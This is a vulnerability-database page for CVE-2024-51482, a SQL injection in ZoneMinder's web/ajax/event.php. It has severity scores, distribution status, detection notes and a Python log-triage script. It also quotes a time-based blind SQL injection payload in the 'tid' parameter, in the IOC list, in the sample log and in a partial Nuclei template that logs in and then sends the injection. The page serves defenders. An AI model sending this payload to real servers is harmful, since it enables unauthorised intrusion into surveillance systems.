CVE-2024-51482
Published 2024-10-31
Priority P274 · critical · 9.9 · CVSS 3.1
Vector: AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
EXPLOIT
EPSS: 36.90% (98.3th percentile)
ZoneMinder is a free, open source closed-circuit television software application. ZoneMinder v1.37.* <= 1.37.64 is vulnerable to boolean-based SQL Injection in function of web/ajax/event.php. This is fixed in 1.37.65.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | zoneminder | — | — |
| zoneminder | zoneminder | — | — |
Detection & IOCs (extracted from sources)
url: /zm/index.php?view=request&request=event&action=removetag&tid=1+AND+(SELECT+6435+FROM+(SELECT(SLEEP(7)))AbUy)
url: /zm/index.php?view=request&request=event&action=removetag&tid=1
- Detect time-based blind SQL injection attempts against ZoneMinder's removetag action by monitoring for SLEEP() payloads in the 'tid' parameter of requests to /zm/index.php with action=removetag.
- A successful exploitation probe returns HTTP 200 with a response body containing '{"result":"OK"' and a response duration >= 7 seconds, indicating a successful time-delay injection.
- Monitor POST requests to /zm?view=login followed by GET requests to the removetag endpoint; this two-step pattern (authenticate, then exploit) is the attack chain for CVE-2024-51482.
- The vulnerable code path is specifically in web/ajax/event.php; alert on any SQL-injection-like patterns (AND, SLEEP, SELECT subqueries) appearing in the 'tid' query parameter routed through this file.
- The vulnerability affects only ZoneMinder versions 1.37.* up to and including 1.37.64; version 1.37.65 and later are patched and are not affected by this specific exploit path.
- Exploitation requires a prior authenticated session; the attack chain involves a login step before the SQL injection request, so detections that look only at unauthenticated traffic may miss the full attack sequence.
- The nuclei template uses a 30-second timeout for the injection request (@timeout: 30s) with a SLEEP(7) payload; detection rules based on response time should account for network latency to avoid false negatives.
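The detection notes above, combined into one log-triage pass, as an added example that is not part of the original page or of the Nuclei template. The log layout (Apache combined format with the request time in seconds appended), the sample lines, and the rule that a legitimate `tid` is a plain integer are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines: Apache combined format with the request time in
# seconds (%T) appended as the last field. This log layout is an assumption.
SAMPLE_LOG = """\
198.51.100.7 - - [01/Nov/2024:10:00:01 +0000] "POST /zm?view=login HTTP/1.1" 302 0 "-" "curl/8.5" 0
198.51.100.7 - - [01/Nov/2024:10:00:02 +0000] "GET /zm/index.php?view=request&request=event&action=removetag&tid=1 HTTP/1.1" 200 31 "-" "curl/8.5" 0
198.51.100.7 - - [01/Nov/2024:10:00:10 +0000] "GET /zm/index.php?view=request&request=event&action=removetag&tid=1+AND+(SELECT+6435+FROM+(SELECT(SLEEP(7)))AbUy) HTTP/1.1" 200 31 "-" "curl/8.5" 7
203.0.113.20 - - [01/Nov/2024:10:05:00 +0000] "GET /zm/index.php?view=request&request=event&action=removetag&tid=42 HTTP/1.1" 200 31 "-" "Mozilla/5.0" 0
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "[^"]*" (?P<secs>\d+)$')
SQL_TOKENS = re.compile(r"\b(select|sleep|benchmark|union|and|or)\b|[()';]", re.I)

def scan(log_text, delay_threshold=7):
    """Return findings for removetag requests whose tid is not a plain integer."""
    logged_in, findings = set(), []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        qs = parse_qs(url.query, keep_blank_values=True)
        if m["method"] == "POST" and qs.get("view") == ["login"]:
            logged_in.add(m["ip"])          # step 1 of the chain: login
            continue
        if not url.path.startswith("/zm") or qs.get("action") != ["removetag"]:
            continue
        tid = qs.get("tid", [""])[0]        # parse_qs already decoded '+' and %xx
        if re.fullmatch(r"[0-9]+", tid):    # assumption: a tag id is an integer
            continue
        findings.append({
            "ip": m["ip"], "tid": tid,
            "sql_tokens": bool(SQL_TOKENS.search(tid)),
            "after_login": m["ip"] in logged_in,
            "delayed_200": m["status"] == "200" and int(m["secs"]) >= delay_threshold,
        })
    return findings
```

Flagging on the non-integer `tid` rather than on the delay keeps the rule independent of network latency; the `delayed_200` field only adds confidence that the injected delay actually ran.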
CVSS provenance
nvd · v3.1 · 9.9 · CRITICAL · CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
osv · 9.9 · CRITICAL
vendor_debian · 9.9 · LOW
Debian
CVE-2024-51482: zoneminder - ZoneMinder is a free, open source closed-circuit television software application...
vendor_debian·2024·CVSS 9.9
Scope: local
bookworm: resolved
bullseye: resolved
forky: resolved
sid: resolved
trixie: resolved
OSV
CVE-2024-51482: ZoneMinder is a free, open source closed-circuit television software application
osv·2024-10-31·CVSS 9.9
No detection rules found.
Nuclei
ZoneMinder v1.37.* <= 1.37.64 - SQL Injection
nuclei·CVSS 9.9
ZoneMinder v1.37.* "
```yaml
# Template fragment; the lines that precede it are missing from this page.
          - "ZoneMinder Login"
          - "ZoneMinder"
        condition: or
        internal: true

  - raw:
      - |
        POST /zm?view=login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=login&postLoginQuery=&username={{username}}&password={{password}}
      - |
        GET /zm/index.php?view=request&request=event&action=removetag&tid=1 HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "{\"result\":\"OK")'
        internal: true

  - raw:
      - |
        @timeout: 30s
        GET /zm/index.php?view=request&request=event&action=removetag&tid=1+AND+(SELECT+6435+FROM+(SELECT(SLEEP(7)))AbUy) HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration>=7'
          - 'status_code == 200'
        condition: and
# digest: 4a0a00473045022100b76cf9b3ac27ea87b83e5bda75eae98298c3d8581ef960c5923888f66bdc24a102202f7
```